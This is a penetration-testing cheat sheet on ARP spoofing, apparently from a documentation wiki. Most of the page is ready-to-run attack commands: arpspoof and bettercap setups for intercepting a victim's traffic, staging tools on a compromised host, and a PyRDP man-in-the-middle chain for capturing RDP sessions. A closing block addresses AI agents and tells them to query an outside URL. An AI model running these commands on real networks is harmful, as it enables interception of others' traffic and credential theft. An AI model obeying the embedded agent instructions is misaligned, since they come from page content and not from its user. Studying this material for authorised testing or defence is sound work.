# ARP Spoofing * * Enable IP forwarding: ``` $ sudo sysctl -w net.ipv4.ip_forward=1 (sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward') (edit /etc/sysctl.conf "net.ipv4.ip_forward = 1" to make it permanent) ``` ## arpspoof (dsniff) * * Install: ``` $ sudo apt install dsniff -y ``` Fire up the attack with Wireshark (filter `ip.src == VICTIM_10.0.0.5`) running: ``` $ sudo arpspoof [-i eth0] [-c both] -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 [-r] ``` ![arpspoof Output Disassembled](/files/-Mh5ORfBVC--x9HJbCJ8) {% hint style="info" %} Wireshark filter while ARP spoofing: ``` (http || ftp || smb || smb2 || ldap) && ip.src == VICTIM_10.0.0.5 ``` {% endhint %} For Windows: [alandau/arpspoof](https://github.com/alandau/arpspoof/releases) ### Portable * * As a portable alternative one may use the Python port of arpspoof compiled with PyInstaller: ``` $ sudo apt install virtualenv $ pip install pyinstaller=3.5 $ git clone https://github.com/byt3bl33d3r/arpspoof $ cd arpspoof $ virtualenv -p `which python2` venv $ . venv/bin/activate $ pip install -r requirements.txt $ pyinstaller --onefile --paths venv/lib/python2.7/site-packages arpspoof/arpspoof.py $ file dist/arpspoof ``` Another approach is to download Python dependencies locally and install them on a compromised Linux host: ``` Dev$ pip download --no-binary=:all: -r requirements.txt Compromised$ python -m pip install --no-index --find-links . -r requirements.txt ``` If you need to launch ARP spoofing on another distro (CentOS, for example), then installing OS dependencies and using a portable binary may be easier: ``` Dev$ mkdir /tmp/tcpdump && yum install --downloadonly --downloaddir=/tmp/tcpdump tcpdump Dev$ ls /tmp/tcpdump libpcap-1.5.3-12.el7.x86_64.rpm tcpdump-4.9.2-4.el7_7.1.x86_64.rpm Compromised$ rpm -i libpcap*.rpm tcpdump*.rpm Compromised$ tcpdump -nvv -i eth0 -s 65535 -w arpfox.pcap "src host VICTIM_10.0.0.5" Compromised$ ./arpfox -l Compromised$ ./arpfox -i eth0 -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 ``` ## bettercap * * * * * Deb dependencies (Ubuntu 18.04 LTS): * [libpcap0.8\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap0.8-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8-dev_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap-dev_1.8.1-6ubuntu1_amd64.deb.html) * [pkg-config\_0.29.1-0ubuntu2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/pkg-config_0.29.1-0ubuntu2_amd64.deb.html) * [libnetfilter-queue1\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue1_1.0.2-2_amd64.deb.html) * [libnfnetlink-dev\_1.0.1-3\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libnfnetlink-dev_1.0.1-3_amd64.deb.html) * [libnetfilter-queue-dev\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue-dev_1.0.2-2_amd64.deb.html) Attack: ``` $ sudo ./bettercap --iface eth0 --caplet arpspoof.cap ``` {% code title="arpspoof.cap" %} ```bash # Quick recon of the network net.probe on # Set the ARP spoofing set arp.spoof.targets $CLIENT_IP set arp.spoof.internal false set arp.spoof.fullduplex false # Control logging and verbosity events.ignore endpoint events.ignore net.sniff # Start the modules arp.spoof on net.sniff on ``` {% endcode %} ### PyRDP * * * Install PyRDP: ``` $ sudo apt update $ sudo apt install python3 python3-pip python3-dev python3-setuptools python3-venv build-essential python3-dev git openssl libgl1-mesa-glx libnotify-bin libxkbcommon-x11-0 libxcb-xinerama0 libavformat-dev libavcodec-dev libavdevice-dev libavutil-dev libswscale-dev libswresample-dev libavfilter-dev -y $ git clone https://github.com/gosecure/pyrdp ~/tools/pyrdp && cd ~/tools/pyrdp $ python3 -m venv venv && source venv/bin/activate $ pip install -U pip setuptools wheel $ pip install -U -e '.[full]' ``` Compile bettercap [from fork](https://github.com/GoSecure/bettercap): ``` $ sudo apt install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y $ mkdir -p $GOPATH/src/github.com/bettercap && cd $GOPATH/src/github.com/bettercap $ git clone https://github.com/GoSecure/bettercap -b rdp-mitm --single-branch && cd bettercap $ go mod init && go mod tidy && go get && go mod vendor && go build ``` Run the attack hoping that the RDP client `192.168.1.3` will connect to the RDP server `192.168.1.2` with NLA disabled: ``` $ curl -sSL https://github.com/GoSecure/caplets/raw/master/rdp-proxy/rdp-sniffer.cap -o rdp-sniffer.cap $ pyrdp-player.py -p 3000 $ sudo ./bettercap -iface eth0 -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.1.2, 192.168.1.3; set rdp.proxy.targets 192.168.1.2; set rdp.proxy.player.ip 127.0.0.1; set rdp.proxy.replay true; set rdp.proxy.command `which pyrdp-mitm.py`" $ sudo arpspoof -i eth0 -t 192.168.1.3 192.168.1.2 -r ``` ## Mitigations Mitigating ARP spoofing: {% file src="/files/i68gGuRjREjoNYIt8R3S" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.